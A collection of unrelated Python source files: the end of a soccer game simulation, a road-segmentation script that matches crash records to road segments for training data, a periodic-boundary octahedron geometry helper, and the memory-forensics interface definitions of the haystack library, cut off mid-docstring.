debug_text=f'{int(round(100*pa[0],0))} ({self.stats.pass_acc[1]["succ"]}/{self.stats.pass_acc[1]["succ"]+self.stats.pass_acc[1]["fail"]})')
self.bar_draw(win, dim, # team 2
W0 + W_/2, H0 + 0.45*H_, (W_ - 2*pad)/2, 0.05*H_,
col=self.team2.color, val=pa[1], invert=True,
debug_text=f'{int(round(100*pa[1],0))} ({self.stats.pass_acc[2]["succ"]}/{self.stats.pass_acc[2]["succ"]+self.stats.pass_acc[2]["fail"]})')
# Shot accuracy
sa = self.stats.get_shot_acc()
self.bar_label_draw(win, dim,
W0, H0 + 0.55*H_, W_, 0.1*H_,
"SHOT ACCURACY")
self.bar_draw(win, dim, # team 1
W0 + pad, H0 + 0.65*H_, (W_ - 2*pad)/2, 0.05*H_,
col=self.team1.color, val=sa[0],
debug_text=f'{int(round(100*sa[1],0))} ({self.stats.shot_acc[2]["succ"]}/{self.stats.shot_acc[2]["succ"]+self.stats.shot_acc[2]["fail"]})')
self.bar_draw(win, dim, # team 2
W0 + W_/2, H0 + 0.65*H_, (W_ - 2*pad)/2, 0.05*H_,
col=self.team2.color, val=sa[1], invert=True,
debug_text=f'{int(round(100*sa[1],0))} ({self.stats.shot_acc[2]["succ"]}/{self.stats.shot_acc[2]["succ"]+self.stats.shot_acc[2]["fail"]})')
def get_state(self):
"""
Create a state object that summarizes the entire game
```
state = {
'team1': {
'players' # list of the team player's coordinates
'goal_x' # The x-coordinate of their goal post
},
'team2': {
'players' # list of the team player's coordinates
'goal_x' # The x-coordinate of their goal post
},
'ball' # Position of the ball
}
```
"""
pos1 = [player.pos for player in self.team1.players]
pos2 = [player.pos for player in self.team2.players]
return {
'team1': {
'players': self.team1.players,
'goal_x': self.team1.goal_x,
},
'team2': {
'players': self.team2.players,
'goal_x': self.team2.goal_x,
},
'ball': self.ball,
}
def next(self):
"""
Move the game forward by 1 frame
Passes state objects to the teams and pass their actions to ```move_next()```
"""
a1 = self.team1.move(self.state_prev, self.state, self.rewards)
a2 = self.team2.move(self.state_prev, self.state, self.rewards)
self.state_prev, self.state, self.rewards = self.move_next(a1, a2)
def move_next(self, a1, a2):
"""
Update the players' and ball's internal state based on the teams' actions
Attributes:
a1 (list): list of actions (1 for each player) in team 1
a2 (list): list of actions (1 for each player) in team 2
Each action must be a key in the ```ACT``` dictionary found in ```const.py```
"""
state_prev = self.get_state()
self.team1.update(a1, self.ball) # Update team's state
self.team2.update(a2, self.ball)
# Check for collision between players
self.collision(self.team1, self.team2, self.ball)
self.ball.update(self.team1, self.team2, a1, a2,
self.stats) # Update ball's state
self.cam.move(self.ball.pos.x, self.ball.pos.y)
state = self.get_state()
return state_prev, state, 0
|
#!/usr/bin/env python
"""Loads records and roads shapefile, outputs data needed for training"""
import argparse
import csv
from dateutil import parser
from dateutil.relativedelta import relativedelta
import fiona
from functools import partial
import itertools
import logging
from math import ceil
import multiprocessing
import os
import pyproj
import pytz
import rtree
from shapely.geometry import mapping, shape, LineString, MultiPoint, Point
from shapely.ops import transform, unary_union
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger()
def should_keep_road(road, road_shp, record_buffers_index):
"""Returns true if road should be considered for segmentation
:param road: Dictionary representation of the road (with properties)
:param roads_shp: Shapely representation of the road
:param record_buffers_index: RTree index of the record_buffers
"""
# If the road has no nearby records, then we can discard it early on.
# This provides a major optimization since the majority of roads don't have recorded accidents.
if not len(list(record_buffers_index.intersection(road_shp.bounds))):
return False
if ('highway' in road['properties']
and road['properties']['highway'] is not None
and road['properties']['highway'] != 'path'
and road['properties']['highway'] != 'footway'):
return True
# We're only interested in non-bridge, non-tunnel highways
# 'class' is optional, so only consider it when it's available.
if ('class' not in road['properties'] or road['properties']['class'] == 'highway'
and road['properties']['bridge'] == 0
and road['properties']['tunnel'] == 0):
return True
return False
def read_roads(roads_shp, records, buffer_size):
"""Reads shapefile and extracts roads and projection
:param roads_shp: Path to the shapefile containing roads
:param records: List of shapely geometries representing record points
:param buffer_size: Number of units to buffer record for checking if road should be kept
"""
# Create a spatial index for record buffers to efficiently find intersecting roads
record_buffers_index = rtree.index.Index()
for idx, record in enumerate(records):
record_point = record['point']
record_buffer_bounds = record_point.buffer(buffer_size).bounds
record_buffers_index.insert(idx, record_buffer_bounds)
shp_file = fiona.open(roads_shp)
roads = []
logger.info('Number of total roads in shapefile: {:,}'.format(len(shp_file)))
for road in shp_file:
road_shp = shape(road['geometry'])
if should_keep_road(road, road_shp, record_buffers_index):
roads.append(road_shp)
return (roads, shp_file.bounds)
def get_intersections(roads):
"""Calculates the intersection points of all roads
:param roads: List of shapely geometries representing road segments
"""
intersections = []
for road1, road2 in itertools.combinations(roads, 2):
if road1.intersects(road2):
intersection = road1.intersection(road2)
if 'Point' == intersection.type:
intersections.append(intersection)
elif 'MultiPoint' == intersection.type:
intersections.extend([pt for pt in intersection])
elif 'MultiLineString' == intersection.type:
multiLine = [line for line in intersection]
first_coords = multiLine[0].coords[0]
last_coords = multiLine[len(multiLine)-1].coords[1]
intersections.append(Point(first_coords[0], first_coords[1]))
intersections.append(Point(last_coords[0], last_coords[1]))
elif 'GeometryCollection' == intersection.type:
intersections.extend(get_intersections(intersection))
# The unary_union removes duplicate points
unioned = unary_union(intersections)
# Ensure the result is a MultiPoint, since calling functions expect an iterable
if 'Point' == unioned.type:
unioned = MultiPoint([unioned])
return unioned
def get_intersection_buffers(roads, road_bounds, intersection_buffer_units, tile_max_units):
"""Buffers all intersections
:param roads: List of shapely geometries representing road segments
:param road_bounds: Bounding box of the roads shapefile
:param intersection_buffer_units: Number of units to use for buffer radius
:param tile_max_units: Maxium number of units for each side of a tile
"""
# As an optimization, the road network is divided up into a grid of tiles,
# and intersections are calculated within each tile.
def roads_per_tile_iter():
"""Generator which yields a set of roads for each tile"""
min_x, min_y, max_x, max_y = road_bounds
bounds_width = max_x - min_x
bounds_height = max_y - min_y
x_divisions = ceil(bounds_width / tile_max_units)
y_divisions = ceil(bounds_height / tile_max_units)
tile_width = bounds_width / x_divisions
tile_height = bounds_height / y_divisions
# Create a spatial index for roads to efficiently match up roads to tiles
logger.info('Generating spatial index for intersections')
roads_index = rtree.index.Index()
for idx, road in enumerate(roads):
roads_index.insert(idx, road.bounds)
logger.info('Number of tiles: {}'.format(int(x_divisions * y_divisions)))
for x_offset in range(0, int(x_divisions)):
for y_offset in range(0, int(y_divisions)):
road_ids_in_tile = roads_index.intersection([
min_x + x_offset * tile_width,
min_y + y_offset * tile_height,
min_x + (1 + x_offset) * tile_width,
min_y + (1 + y_offset) * tile_height
])
roads_in_tile = [roads[road_id] for road_id in road_ids_in_tile]
if len(roads_in_tile) > 1:
yield roads_in_tile
# Allocate one worker per core, and parallelize the discovery of intersections
pool = multiprocessing.Pool(multiprocessing.cpu_count())
tile_intersections = pool.imap(get_intersections, roads_per_tile_iter())
pool.close()
pool.join()
logger.info('Buffering intersections')
# Note: tile_intersections is a list of multipoints (which is a list of points).
# itertools.chain.from_iterable flattens the list into a list of single points.
buffered_intersections = [intersection.buffer(intersection_buffer_units)
for intersection in itertools.chain.from_iterable(tile_intersections)]
# If intersection buffers overlap, union them to treat them as one
logger.info('Performing unary union on buffered intersections')
return unary_union(buffered_intersections)
def split_line(line, max_line_units):
"""Checks the line's length and splits in half if larger than the configured max
:param line: Shapely line to be split
:param max_line_units: The maximum allowed length of the line
"""
if line.length <= max_line_units:
return [line]
half_length = line.length / 2
coords = list(line.coords)
for idx, point in enumerate(coords):
proj_dist = line.project(Point(point))
if proj_dist == half_length:
return [LineString(coords[:idx + 1]), LineString(coords[idx:])]
if proj_dist > half_length:
mid_point = line.interpolate(half_length)
head_line = LineString(coords[:idx] + [(mid_point.x, mid_point.y)])
tail_line = LineString([(mid_point.x, mid_point.y)] + coords[idx:])
return split_line(head_line, max_line_units) + split_line(tail_line, max_line_units)
def get_intersection_parts(roads, int_buffers, max_line_units):
"""Finds all segments that intersect the buffers, and all that don't
:param roads: List of shapely geometries representing road segments
:param int_buffers: List of shapely polygons representing intersection buffers
"""
# Create a spatial index for intersection buffers to efficiently find intersecting segments
int_buffers_index = rtree.index.Index()
for idx, intersection_buffer in enumerate(int_buffers):
int_buffers_index.insert(idx, intersection_buffer.bounds)
segments_map = {}
non_int_lines = []
for road in roads:
road_int_buffers = []
for idx in int_buffers_index.intersection(road.bounds):
int_buffer = int_buffers[idx]
if int_buffer.intersects(road):
if idx not in segments_map:
segments_map[idx] = []
segments_map[idx].append(int_buffer.intersection(road))
road_int_buffers.append(int_buffer)
# Collect the non-intersecting segments
if len(road_int_buffers) > 0:
diff = road.difference(unary_union(road_int_buffers))
if 'LineString' == diff.type:
non_int_lines.append(diff)
elif 'MultiLineString' == diff.type:
non_int_lines.extend([line for line in diff])
else:
non_int_lines.append(road)
# Union all lines found within a buffer, treating them as a single unit
int_multilines = [unary_union(lines) for _, lines in segments_map.items()]
# Split any long non-intersecting segments. It's not important that they
# be equal lengths, just that none of them are exceptionally long.
split_non_int_lines = []
for line in non_int_lines:
split_non_int_lines.extend(split_line(line, max_line_units))
# Return a tuple of intersection multilines and non-intersecting segments
return (int_multilines, split_non_int_lines)
def read_records(records_csv, road_projection, record_projection, tz, col_id,
col_x, col_y, col_occurred):
"""Reads records csv, projects points, and localizes datetimes
:param records_csv: Path to CSV containing record data
:param road_projection: Projection CRS for road data
:param record_projection: Projection CRS for record data
:param tz: Timezone id for record data
:param col_id: Record id column name
:param col_x: Record x-coordinate column name
:param col_y: Record y-coordinate column name
:param col_occurred: Record occurred datetime column name
"""
# Create a function for projecting a point
project = partial(
pyproj.transform,
pyproj.Proj(record_projection),
pyproj.Proj(road_projection)
)
records = []
min_occurred = None
max_occurred = None
with open(records_csv, 'rb') as records_file:
csv_reader = csv.DictReader(records_file)
for row in csv_reader:
# Collect min and max occurred datetimes, as they'll be used later on
try:
parsed_dt = parser.parse(row[col_occurred])
# Localize datetimes that aren't timezone-aware
occurred = parsed_dt if parsed_dt.tzinfo else tz.localize(parsed_dt)
except:
# Skip the record if it has an invalid datetime
continue
if not min_occurred or occurred < min_occurred:
min_occurred = occurred
if not max_occurred or occurred > max_occurred:
max_occurred = occurred
records.append({
'id': row[col_id],
'point': transform(project, Point(float(row[col_x]), float(row[col_y]))),
'occurred': occurred
})
return records, min_occurred, max_occurred
def match_records_to_segments(records, combined_segments, match_tolerance):
"""Matches up each record to its nearest segment
:param records: List of record objects
:param combined_segments: List of Shapely objects representing road segments (+ intersections)
:param match_tolerance: Number of units to buffer for checking a record/road match
"""
# Create a spatial index for segments to efficiently find nearby records
segments_index = rtree.index.Index()
for idx, element in enumerate(combined_segments):
segments_index.insert(idx, element.bounds)
segments_with_records = {}
for record in records:
record_point = record['point']
# A record won't always be exactly on the line, so buffer the point
# by the match tolerance units to capture nearby segments
record_buffer_bounds = record_point.buffer(match_tolerance).bounds
nearby_segments = segments_index.intersection(record_buffer_bounds)
segment_id_with_distance = [
(segment_id, combined_segments[segment_id].distance(record_point))
for segment_id in nearby_segments
]
if len(segment_id_with_distance):
nearest = min(segment_id_with_distance, key=lambda tup: tup[1])
segment_id = nearest[0]
if segment_id not in segments_with_records:
segments_with_records[segment_id] = []
segments_with_records[segment_id].append(record)
return segments_with_records
def get_segments_with_data(combined_segments, segments_with_records, min_occurred, max_occurred):
"""Adds calculated data to each segment
:param combined_segments: List of Shapely objects representing road segments (+ intersections)
:param segments_with_records: List of tuples containing record objects and segments
:param min_occurred: Minimum occurred date of records
:param max_occurred: Maximum occurred date of records
"""
# Define the schema used for writing to a shapefile (and a csv).
# The schema is defined here, because we need to add some variable
# properties to it later on in the function which is dependent on
# the number of years of data available. It's also good to have it
# here since the data being generated here needs to conform to this
# schema, so a future edit will only involve modifying this function.
schema = {
'geometry': 'MultiLineString',
'properties': {
# Unique identifier for this segment
'id': 'int',
# Length of the segment
'length': 'float',
# Number of lines in the segment (measure of intersection complexity)
'lines': 'int',
# X-coordinate of segment centroid
'pointx': 'float',
# Y-coordinate of segment centroid
'pointy': 'float',
# Total number of records matched
'records': 'int'
}
}
# Figure out the number of full years of data we have so we can create offset aggregations.
# A year is defined here as 52 weeks, in case we eventually want to do week/month aggregations.
num_years = (max_occurred - min_occurred).days / (52 * 7)
# Create the set of year ranges
year_ranges = [
(max_occurred - relativedelta(years=offset),
max_occurred - relativedelta(years=(offset + 1)),
't{}records'.format(offset))
for offset in range(num_years)
]
# Add fields to the schema for each year range
for year_range in year_ranges:
_, _, records_label = year_range
# Number of records within the offset period
schema['properties'][records_label] = 'int'
segments_with_data = []
for idx, segment in enumerate(combined_segments):
is_intersection = 'MultiLineString' == segment.type
records = segments_with_records.get(idx)
data = {
'id': idx,
'length': segment.length,
'lines': len(segment) if is_intersection else 1,
'pointx': segment.centroid.x,
'pointy': segment.centroid.y,
'records': len(records) if records else 0
}
# Add time offset aggregation data
for year_range in year_ranges:
max_occurred, min_occurred, records_label = year_range
if records:
records_in_range = [
record for record in records
if min_occurred < record['occurred'] <= max_occurred
]
data[records_label] = len(records_in_range)
else:
data[records_label] = 0
segments_with_data.append((segment, data))
return (schema, segments_with_data)
def write_segments_shp(segments_shp_path, road_projection, segments_with_data, schema):
"""Writes all segments to shapefile (both intersections and individual segments)
:param segments_shp_path: Path to shapefile to write
:param road_projection: Projection of road data
:param segments_with_data: List of tuples containing segments and segment data
:param schema: Schema to use for writing shapefile
"""
with fiona.open(segments_shp_path, 'w', driver='ESRI Shapefile',
schema=schema, crs=road_projection) as output:
for segment_with_data in segments_with_data:
segment, data = segment_with_data
output.write({
'geometry': mapping(segment),
'properties': data
})
def write__training_csv(segments_csv_path, segments_with_data, schema):
"""Writes all segments containing record data to csv for training
:param segments_csv_path: Path to CSV to write
:param segments_with_data: List of tuples containing segments and segment data
:param schema: Schema to use for writing CSV
"""
field_names = sorted(schema['properties'].keys())
with open(segments_csv_path, 'w') as csv_file:
csv_writer = csv.DictWriter(csv_file, fieldnames=field_names)
csv_writer.writeheader()
for segment_with_data in segments_with_data:
_, data = segment_with_data
if data['records'] > 0:
csv_writer.writerow(data)
def main():
"""Main entry point of script"""
parser = argparse.ArgumentParser(description='Generate training input')
# Required arguments
parser.add_argument('roads_shp', help='Path to shapefile containing OSM road data')
parser.add_argument('records_csv', help='Path to CSV containing record data')
# Optional arguments
parser.add_argument('--output-dir', help='Directory where files are output', default='.')
parser.add_argument('--combined-segments-shp-name', help='Combined segments output .shp name',
default='combined_segments.shp')
parser.add_argument('--training-csv-name',
help='Training input .csv name',
default='training_input.csv')
parser.add_argument('--intersection-buffer-units', help='Units to buffer each intersection',
default=5)
parser.add_argument('--tile-max-units', help='Maximum units for each side of a tile',
default=3000)
parser.add_argument('--max_line_units', help='Maximum units allowed for line segment',
default=200)
parser.add_argument('--time-zone', help='Time zone of records', default='America/New_York')
parser.add_argument('--match-tolerance', help='Units to buffer when matching records to roads',
default=5)
parser.add_argument('--road-projection', help='Projection id of roads', default='epsg:32718')
parser.add_argument('--record-projection', help='Projection id of records', default='epsg:4326')
parser.add_argument('--record-col-id', help='Record column: id', default='CRN')
parser.add_argument('--record-col-x', help='Record column: x-coordinate', default='LNG')
parser.add_argument('--record-col-y', help='Record column: y-coordinate', default='LAT')
parser.add_argument('--record-col-occurred', help='Record column: occurred',
default='DATETIME')
args = parser.parse_args()
logger.info('Reading records from {}'.format(args.records_csv))
tz = pytz.timezone(args.time_zone)
road_projection = {'init': args.road_projection}
record_projection = {'init': args.record_projection}
match_tolerance = args.match_tolerance
records, min_occurred, max_occurred = read_records(
args.records_csv, road_projection, record_projection, tz,
args.record_col_id, args.record_col_x, args.record_col_y,
args.record_col_occurred
)
logger.info('Found {:,} records between {} and {}'.format(
len(records), min_occurred.date(), max_occurred.date())
)
logger.info('Reading shapefile from {}'.format(args.roads_shp))
roads, road_bounds = read_roads(args.roads_shp, records, match_tolerance)
logger.info('Number of relevant roads in shapefile: {:,}'.format(len(roads)))
logger.info('Calculating intersections')
int_buffers = get_intersection_buffers(roads, road_bounds, args.intersection_buffer_units,
args.tile_max_units)
logger.info('Getting intersection parts')
int_multilines, non_int_lines = get_intersection_parts(roads, int_buffers, args.max_line_units)
combined_segments = int_multilines + non_int_lines
logger.info('Found {:,} intersection multilines'.format(len(int_multilines)))
logger.info('Found {:,} non-intersection lines'.format(len(non_int_lines)))
logger.info('Found {:,} combined segments'.format(len(combined_segments)))
segments_with_records = match_records_to_segments(
records, combined_segments, match_tolerance)
logger.info('Found {:,} segments with records'.format(len(segments_with_records)))
schema, segments_with_data = get_segments_with_data(
combined_segments, segments_with_records, min_occurred, max_occurred
)
logger.info('Compiled data for {:,} segments'.format(len(segments_with_data)))
segments_shp_path = os.path.join(args.output_dir, args.combined_segments_shp_name)
write_segments_shp(segments_shp_path, road_projection, segments_with_data, schema)
logger.info('Generated shapefile')
training_csv_path = os.path.join(args.output_dir, args.training_csv_name)
write__training_csv(training_csv_path, segments_with_data, schema)
logger.info('Generated csv for training')
if __name__ == '__main__':
main()
|
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from mpl_toolkits.mplot3d import proj3d
#import sys
from vecPBC import vecPBC
# Takes the points of the square and adds the extra points to complete the octahedron
# This assumes the points going CW a,b,c,d
# 2 extra points to define
def PBC_check(vec, Lxmin, Lxmax, Lymin, Lymax, Lzmin, Lzmax):
Lx = Lxmax - Lxmin
Ly = Lymax - Lymin
Lz = Lzmax - Lzmin
if vec[0] < Lxmin:
vec[0] += Lx
elif vec[0] > Lxmax:
vec[0] -= Lx
if vec[1] < Lymin:
vec[1] += Ly
elif vec[1] > Lymax:
vec[1] -= Ly
if vec[2] < Lzmin:
vec[2] += Lz
elif vec[2] > Lzmax:
vec[2] -= Lz
return vec
def square_to_octahedron(self):
# Set the box side length
Lxmax = self.boxBounds[0][1]
Lxmin = self.boxBounds[0][0]
Lymax = self.boxBounds[1][1]
Lymin = self.boxBounds[1][0]
Lzmax = self.boxBounds[2][1]
Lzmin = self.boxBounds[2][0]
Lx = Lxmax - Lxmin
Ly = Lymax - Lymin
Lz = Lzmax - Lzmin
box_center = [0.5*(Lxmax + Lxmin), 0.5*(Lymax + Lymin), 0.5*(Lzmax + Lzmin)]
a,c,b,d = self.vertices
a = np.array(self.xyz[a][:self.dim], dtype=np.float)
b = np.array(self.xyz[b][:self.dim], dtype=np.float)
c = np.array(self.xyz[c][:self.dim], dtype=np.float)
d = np.array(self.xyz[d][:self.dim], dtype=np.float)
center = np.array([self.x, self.y, self.z], dtype=np.float)
center_a = np.array(vecPBC(a, center, Lx, Ly, Lz), dtype=np.float)
center_a_mag = np.sqrt(sum([i**2 for i in center_a]))
ad = np.array(vecPBC(d, a, Lx, Ly, Lz), dtype=np.float)
ab = np.array(vecPBC(b, a, Lx, Ly, Lz), dtype=np.float)
ac = np.array(vecPBC(c, a, Lx, Ly, Lz), dtype=np.float)
abmag = np.sqrt(sum([i**2 for i in ab]))
acmag = np.sqrt(sum([i**2 for i in ac]))
admag = np.sqrt(sum([i**2 for i in ad]))
#print("a: ", a)
#print("b: ", b)
#print("c: ", c)
#print("d: ", d)
#print("ab: ", ab)
#print("ac: ", ac)
#print("ad: ", ad)
#print("\n\nabmag, acmag, admag, center_a_mag: ", abmag, acmag, admag, center_a_mag, "\n\n")
abcrossad = np.array([ab[1]*ad[2] - ab[2]*ad[1], ab[2]*ad[0] - ab[0]*ad[2], ab[0]*ad[1] - ab[1]*ad[0]], dtype=np.float)
abcrossad_mag = np.sqrt(sum([i**2 for i in abcrossad]))
abcrossad_unit = np.array([i/abcrossad_mag for i in abcrossad], dtype=np.float)
# Add the new particles to self.xyz and to self.vertices of this particle
# The [-1] is the particle type, just meaning not a center particle and not part of the original square ([2])
new = a + 0.5*ad + 0.5*ab + center_a_mag*abcrossad_unit
new = PBC_check(new, Lxmin, Lxmax, Lymin, Lymax, Lzmin, Lzmax)
self.xyz[len(self.xyz)] = [i for i in new]+[-1]
self.vertices.append(len(self.xyz)-1)
new = a + 0.5*ad + 0.5*ab - center_a_mag*abcrossad_unit
new = PBC_check(new, Lxmin, Lxmax, Lymin, Lymax, Lzmin, Lzmax)
self.xyz[len(self.xyz)] = [i for i in new]+[-1]
self.vertices.append(len(self.xyz)-1)
# Plot to check
'''
#new = a + 0.5*ad + 0.5*ab - center_a_mag*abcrossad_unit
new = a + 0.8*ad
new = PBC_check(new, Lxmin, Lxmax, Lymin, Lymax, Lzmin, Lzmax)
self.xyz[len(self.xyz)] = [i for i in new]+[-1]
self.vertices.append(len(self.xyz)-1)
new = d
new = PBC_check(new, Lxmin, Lxmax, Lymin, Lymax, Lzmin, Lzmax)
self.xyz[len(self.xyz)] = [i for i in new]+[-1]
self.vertices.append(len(self.xyz)-1)
new = c
new = PBC_check(new, Lxmin, Lxmax, Lymin, Lymax, Lzmin, Lzmax)
self.xyz[len(self.xyz)] = [i for i in new]+[-1]
self.vertices.append(len(self.xyz)-1)
new = b
new = PBC_check(new, Lxmin, Lxmax, Lymin, Lymax, Lzmin, Lzmax)
self.xyz[len(self.xyz)] = [i for i in new]+[-1]
self.vertices.append(len(self.xyz)-1)
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for i in self.vertices[:4]:
print(self.xyz[i])
ax.scatter(self.xyz[i][0], self.xyz[i][1], self.xyz[i][2], s=10, c="r")
for i in self.vertices[4:]:
ax.scatter(self.xyz[i][0], self.xyz[i][1], self.xyz[i][2], s=12, c="b")
print(self.xyz[i])
#particle 40
#verts = [[7.28345,3.31776,-0.308475],[6.61942,3.2388,-0.648072],[6.96409,3.63711,-0.58646],[6.93877,2.91945,-0.370088]]
#verts = [[7.09526,3.68979,-0.696505],[7.66702,3.23143,-0.856172],[7.57883,3.60897,-0.494323],[7.18345,3.31224,8.94165]]
#for i in verts:
# ax.scatter(i[0], i[1], i[2], s=15, c="k")
ax.set_xlabel("X")
ax.set_ylabel("Y")
ax.set_zlabel("Z")
#ax.set_xlim(-acmag, acmag)
#ax.set_ylim(-acmag, acmag)
#ax.set_zlim(-acmag, acmag)
plt.show()
plt.close()
sys.exit(0)
'''
|
<filename>deploy/virenv/lib/python2.7/site-packages/haystack/abc/interfaces.py
# -*- coding: utf-8 -*-
class IMemoryMapping(object):
"""Interface for a memory mapping.
A IMemoryMapping should hold one of a process memory _memory_handler and its start and stop addresses.
"""
def _vtop(self, vaddr):
"""Translates the virtual address to a physical address from the underlying storage.
:param vaddr: long the virtual address.
:return: the physical address in the underlying storage object for a virtual address
:rtype: long
"""
raise NotImplementedError(self)
def _ptov(self, paddr):
"""Translates the physical address from the underlying storage to a virtual address.
:param paddr: long the physical address.
:return: the virtual address in the process memory from the physical address
:rtype: long
"""
raise NotImplementedError(self)
def read_array(self, address, basetype, count):
"""Reads the memory content at address <address> and returns an typed array.
:param address: long the virtual address.
:param basetype: a ctypes class.
:param count: long the size of the array.
:return: the memory content at address, in an array form
:rtype: (basetype*count) ctypes class
"""
raise NotImplementedError(self)
def read_bytes(self, address, size):
"""Reads the memory content at address <address> and returns an array of bytes in a str.
:param address: long the virtual address.
:param size: long the size of the array.
:return: the memory content at address, in an bytes string
:rtype: str
"""
raise NotImplementedError(self)
def read_cstring(self, address, max_size, chunk_length=256):
"""Reads the memory content at address <address> and returns a python representation
of the NULL terminated string.
:param address: long the virtual address.
:param max_size: long the maximum size of the string.
:param chunk_length: (optional) long the number of bytes read at each buffer read.
:return: the memory content at address, in an bytes string
:rtype: str
"""
raise NotImplementedError(self)
def read_struct(self, address, struct):
"""Reads the memory content at address <address> and returns an ctypes record instance.
:param address: long the virtual address.
:param struct: a ctypes class.
:return: the memory content at address, in an ctypes record form
:rtype: (struct) ctypes class
"""
raise NotImplementedError(self)
def read_word(self, address):
"""Reads the memory content at address <address> and returns an word worth of it.
Usually 4 or 8 bytes.
:param address: long the virtual address.
:return: the memory content at address, in an bytes string
:rtype: str
"""
raise NotImplementedError(self)
def search(self, bytestr):
"""Search the memory for this particular sequence of bytes and iterates over the starting
address of the results.
:param bytestr: bytes str, the sequence of bytes to look for.
:return: (iterator) long, the list of virtual address matching the byte pattern
:rtype: iterator, long, the starting virtual address of the match
"""
raise NotImplementedError(self)
def __contains__(self, address):
raise NotImplementedError(self)
def __len__(self):
raise NotImplementedError(self)
class IMemoryLoader(object):
"""Parse a process memory _memory_handler from a storage concept,
then identify its ITargetPlatform characteristics
and produce an IMemoryHandler for this process memory dump """
def make_memory_handler(self):
"""Returns an instance of IMemoryHandler """
raise NotImplementedError(self)
class IMemoryHandler(object):
"""Interface for the MemoryHandler class."""
def get_name(self):
"""Returns the name of the process memory dump we are analysing"""
raise NotImplementedError(self)
# helper methods that do not impact the internals
def get_target_platform(self):
"""Returns the ITargetPlatform for that process memory."""
raise NotImplementedError(self)
def get_heap_finder(self):
"""Returns the IHeapFinder for that process memory."""
raise NotImplementedError(self)
def get_model(self):
"""Returns the Model cache."""
raise NotImplementedError(self)
# class proper methods
def get_mappings(self):
"""
return the list of IMemoryMapping
:return: list of IMemoryMapping
"""
raise NotImplementedError(self)
def reset_mappings(self):
"""
Temporarly closes all file used by this handler.
:return:
"""
raise NotImplementedError(self)
# reverse helper
def get_reverse_context(self):
raise NotImplementedError(self)
def get_mapping_for_address(self, vaddr):
"""Returns the IMemoryMapping that contains this virtual address."""
raise NotImplementedError(self)
def iter_mapping_with_name(self, pathname):
"""Returns the IMemoryMapping _memory_handler with the name pathname"""
raise NotImplementedError(self)
def is_valid_address(self, obj, struct_type=None):
"""Return true is the virtual address is a valid address in a IMemoryMapping"""
raise NotImplementedError(self)
def is_valid_address_value(self, addr, struct_type=None):
"""Return true is the virtual address is a valid address in a IMemoryMapping"""
raise NotImplementedError(self)
def __contains__(self, vaddr):
"""Return true is the virtual address is a valid address in a IMemoryMapping"""
raise NotImplementedError(self)
def __len__(self):
"""Return the number of IMemoryMapping"""
raise NotImplementedError(self)
def __getitem__(self, i):
raise NotImplementedError(self)
def __setitem__(self, i, val):
raise NotImplementedError(self)
def __iter__(self):
raise NotImplementedError(self)
class IMemoryCache(object):
"""Interface for the MemoryCache class.
Usage 1:
+ when one uses the model to load a record from the underlying memory, the record
can be cached as to improve performance:
- memory storage could be slow like in ProcessMemoryMapping
Usage 2:
+ one can ou this cache to store plain old python object equivalent of ctypes record
when translating memory structure in python class, json, or other
- circular dependencies can be resolved
"""
def reset(self):
"""Clean the book"""
raise NotImplementedError(self)
def getRefs(self):
"""Lists all references to already loaded structs. Useful for debug"""
raise NotImplementedError(self)
def printRefs(self):
"""Prints all references to already loaded structs. Useful for debug"""
raise NotImplementedError(self)
def printRefsLite(self):
"""Prints all references to already loaded structs. Useful for debug"""
raise NotImplementedError(self)
def hasRef(self, typ, orig_addr):
"""Check if this type has already been loaded at this address"""
raise NotImplementedError(self)
def getRef(self, typ, orig_addr):
"""Returns the reference to the type previously loaded at this address"""
raise NotImplementedError(self)
def getRefByAddr(self, addr):
raise NotImplementedError(self)
def keepRef(self, obj, typ=None, orig_addr=None):
"""Keeps a reference for an object of a specific type loaded from a specific
address.
Sometypes, your have to cast a c_void_p, You can keep ref in Ctypes object,
they might be transient (if obj == somepointer.contents)."""
# TODO, memory leak for different objects of same size, overlapping
# struct.
raise NotImplementedError(self)
def delRef(self, typ, orig_addr):
"""Forget about a Ref."""
raise NotImplementedError(self)
class ITargetPlatform(object):
"""The guest platform information for the process memory handled by IMemoryHandler.
Immutable, its characteristics should be set once at creation time.
"""
def get_word_type(self):
"""Returns the memory guest word base ctypes type (int21 or int4) """
raise NotImplementedError(self)
def get_word_type_char(self):
"""Returns the memory guest word base ctypes character (I or Q) """
raise NotImplementedError(self)
def get_word_size(self):
"""Returns the memory guest word base ctypes type size (4 or 8) """
raise NotImplementedError(self)
def get_target_ctypes(self):
"""Returns the ctypes proxy instance adequate for the target process' platform """
raise NotImplementedError(self)
def get_target_ctypes_utils(self):
"""Returns the ctypes utils instance with additional ctypes helper method
:rtype: ICTypesUtils"""
raise NotImplementedError(self)
def get_os_name(self):
"""Returns the name of the host platform"""
raise NotImplementedError(self)
def get_cpu_bits(self):
"""Returns the cpu bits of the host platform"""
raise NotImplementedError(self)
class IHeapFinder(object):
"""
Parse the IMemoryHandler's list of IMemoryMapping to find process Heaps.
The IHeapFinder needs to be initialized with a IMemoryHandler.
"""
def list_heap_walkers(self):
"""
Return the list of heaps that load as heaps
:return: list of IMemoryMapping
"""
raise NotImplementedError(self)
def get_heap_module(self):
"""
Returns the heap module.
:return: module
"""
raise NotImplementedError(self)
def get_heap_walker(self, heap):
"""
return a IHeapWalker for that heap
:param heap: IMemoryMapping
:return: IHeapWalker
"""
raise NotImplementedError(self)
class IHeapWalker(object):
"""
Parse a heap IMemoryMapping for chunks of allocated memory or free chunks in the heap.
The IHeapWalker needs to be initialized with a IMemoryHandler and a IMemoryMapping
"""
def get_target_platform(self):
"""Returns the ITargetPlatform for that process memory Heap."""
raise NotImplementedError(self)
def get_heap_address(self):
""" returns the address of the used heap """
raise NotImplementedError('Please implement all methods')
def get_user_allocations(self):
""" returns all User allocations (addr,size) """
raise NotImplementedError('Please implement all methods')
def get_free_chunks(self):
""" returns all free chunks in the heap (addr,size) """
raise NotImplementedError('Please implement all methods')
class ICTypesUtils(object):
"""
Some additional helper methods for ctypes
"""
def formatAddress(self, addr):
raise NotImplementedError('Please implement all methods')
def unpackWord(self, bytes, endianess):
raise NotImplementedError('Please implement all methods')
def is_address_local(self, obj, structType):
"""
Costly , checks if obj is mapped to local memory space.
Returns the memory mapping if found.
False, otherwise.
"""
raise NotImplementedError('Please implement all methods')
def get_pointee_address(self, obj):
"""
Returns the address of the struct pointed by the obj, or null if invalid.
